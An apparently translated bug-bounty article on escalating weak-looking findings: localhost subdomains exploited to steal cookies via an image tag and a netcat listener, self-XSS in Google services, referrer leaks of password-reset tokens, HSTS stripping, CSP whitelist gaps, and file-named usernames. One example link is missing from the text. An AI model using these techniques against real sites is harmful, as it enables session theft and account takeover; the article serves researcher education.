Bug Bounty—vulnerability reward programs for vendors—become more and more widespread. And sometimes, vulnerabilities search detects some evidently insecure areas (e.g., self-XSS) the threat of which is hard to prove. But the larger (or even the smarter) is the vendor (e.g., Google), the more willing it is to discuss, to detect the indicated vulnerability and to reward if successful. This article is a collating of complex situations and the ways to prove a threat and to make the Internet more secure.
The vulnerability lies in its presence in the records of the domains’ subdomains, which contain addresses belonging to the local network.
Let’s suppose that when searching subdomains, we’ve found something like local.target.com, which points to 127.0.0.1 address (or simply to an IP from the local network).
Let’s consider a case when the subdomain points to 127.0.0.1 address. Let’s assume some organization which works through thin clients, and the employees of which work with one and the same device with 127.0.0.1 IP-address. In this case, the intruder can be a local user of the system. To attack, the intruder binds the port on “the upper levels”, e.g., 10024 (because the “lower” ports require the appropriate rights). Then, the intruder sends the victim (another user of the same system) a mail containing resources downloaded from the vulnerable system address, which, in its turn, points to the local IP, e.g.,
<img src = http://local.target.com:10024/>. Once the victim opens the mail and downloads an image from *.target.com, the intruder will receive the victim’s cookies, which will be afterwards transmitted to the thoughtfully open wireless sniffer or netcat. One little trick: such and, indeed, other systems have the CUPS service (for printers), the interface of which contains many XSS. In this case, a remote intruder can profit by run of a subdomain local address error. For example, making the user follow such link like:
If the domain points to the local network IP, one can demonstrate the following vector: being in the same local network with the victim, one can occupy the proper subdomain IP-address and ask the user to follow the link.
Szymon Gruszecki earned $100 in Self Bounty hackerone for such an invention (report 1509).
Google and self-XSS
Continuing on self-XSS attacks, I’d like to pay your attention to Google Company as one of the most generous one in terms of the rewards for the vulnerabilities detected. Depending on the Google service, almost any self-XSS vector can be considered as a non-self one, because both in Gmail and in Google Analytics, there is a function enabling to search your own account with other users simply by entering their email. What comes to mind immediately is a story when an XSS was in the name of a downloaded file of Analytics, and this XSS was performed only against the user’s own account. However (as we mentioned above) this vector could be used against other users as well. Of course, the unknown author of this feature has been rewarded.
User’s data leak — malicious referrers
Vulnerability means a negligent processing of user’s sensitive data — availability of session data in GET-queries, tagging in search services, etc.
Current and the most widespread HTTP-protocol version includes a referrer with a URL which shows where the user “comes from”. Just imagine: the user resets a password, receives a mail, follows the link with a password change token, and sees some image from the other web-site (e.g., a comics from xkcd.com on how to choose a right password) right on the password change service. The image query will be performed… That’s right, with the referrer value containing the password reset token. As a result, the owner of the domain where the content (e.g., an image) comes from can mesh the password change tokens and change them faster than the user does. HackerOne gained $100 for such an invention.
Web Server Misconfiguration — insecure redirectors
Vulnerability lies in the web-server configuration faults, particularly, in Strict Transport Security parameter value.
Generally, one shouldn’t transmit any sensitive data (passwords, card numbers, etc.) directly through HTTP, it’s better to use HTTPS or, better yet, make all the resource work through HTTPS. So, how does it usually happen? A user requests a website through HTTP — http://site.com, and receives such kind of a response:
HTTP/1.1 302 Found Server: nginx/1.2.4 Date: Mon, 28 Apr 2014 15:22:23 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: PHP/5.3 Location: https://site.com/
This response will redirect the user to the website HTTPS-version to prevent a man-in-the-middle attack. But… an intruder can start the data capture earlier, after having replaced the server response for the user not to be redirected to any other site. To prevent such situation, the Strict-Transport-Security header is used in the server response. It reports to the browser not to visit this resource through HTTP anymore, but to use HTTPS, and indicates the action time of this rule (to enter only through HTTPS) for this website. Let’s imagine: a user comes to a website from potentially risk free environment for the first time (e.g., from home computer), the server response has been captured, and Strict-Transport-Security header has been removed by the intruder. Then, the user comes to the website again, but from an insecure environment, e.g., a cyber cafe, where nobody “cuts out” the headers, and the user can safely get in the website. So, let’s turn back to Bug Bounty. There was a resource with incorrect settings — a header used to be sent when redirecting from HTTP to HTTPS. But the duration of this rule was relatively short — 180 days. By the way, it should be noted that there is a pre-shared list of the websites which can be visited only through HTTPS (HSTS preload list) — goo.gl/KxrNtl.
Misconfiguration — Content-Security-Policy — both exists and doesn’t exist
Vulnerability: web-application determines the Content Security Policy sharing rules incorrectly.
Content Security Policy (CSP) header is rather well known and becomes more and more popular. It’s transmitted through the web-server response and reports to the browser which content can be downloaded and from where (images and so on). Mainly it’s meant for protection from XSS-attacks consequences, and the mentioned sniffer cannot be embedded from your own website anymore (in case of correct CSP rules). But the point is that not all the browsers support it, and sometimes the developers take a decision not to send the header to the client if his/her browser doesn’t support CSP. So the developers define the white list of browsers (in fact — a list of the UserAgent fields) which can receive the header. As a result, we have the following problems:
- a response without the CSP-header can be cached by the client side (e.g., on proxy-server). Though it can be done by the server side as well, somewhere on intermediate cache-servers. As a result, this response (without CSP) can be given to a user whose browser supports CSP;
- more and more Chromium fork browsers are being created where users can put their own UA not included into the white list for obvious reasons.
As you see, these situations may lead to the case from the headline — CSP both exists and doesn’t exist, even for those who support it. On HackerOne somebody was even rewarded for that kind of staff, but everybody thinks the same. Facebook, for example, has some troubles: they work with the very white lists and don’t send CSP to everyone (only to Chrome starting from X version, FF starting from Y version, but not between A1 and B1), because having such a large amount of users (like Facebook has), one should think about compatibility (some FF versions have troubles with this issue); so, if you don’t send the header, you don’t lose the users. They plan to eliminate this rule in the future.
Web Application Misconfiguration — insecure %username%
Vulnerability lies in incorrect design of an application, the functionality of which allows an intruder to replace the content of the system files in the application web-directory.
URL for a personal profile access is generated differently depending on the website. Mostly it’s something like /users/username/, but sometimes the domain is followed by a username, e.g., http://example.com/username. Let’s go deeper and assume that dots in the username are allowed… So, we can register a user with an unusual name, like robots.txt and, perhaps, replace the web crawlers file content enabling them to index what they shouldn’t index! It’s not far to seek for example, you should remember SMS leak from the website of MegaFon. Moreover, many similar situations can happen.
As you can see, there are many different ways to use a secure, from the first sight, bug. Much depends on one’s understanding, experience, usage environment, and imagination :). I recommend to keep an eye on different hackerone.com bugs, because after closing, many vulnerabilities become publicized. You can also read about the full paths leaks through CSS-files, absence of SPF-record in domain and, consequently, about the possibility to spoof the sent e-mails (cause SMPT enables to spoof the talker address “under standard”), and about many other equally interesting and a bit weird things :). Happy bughunting!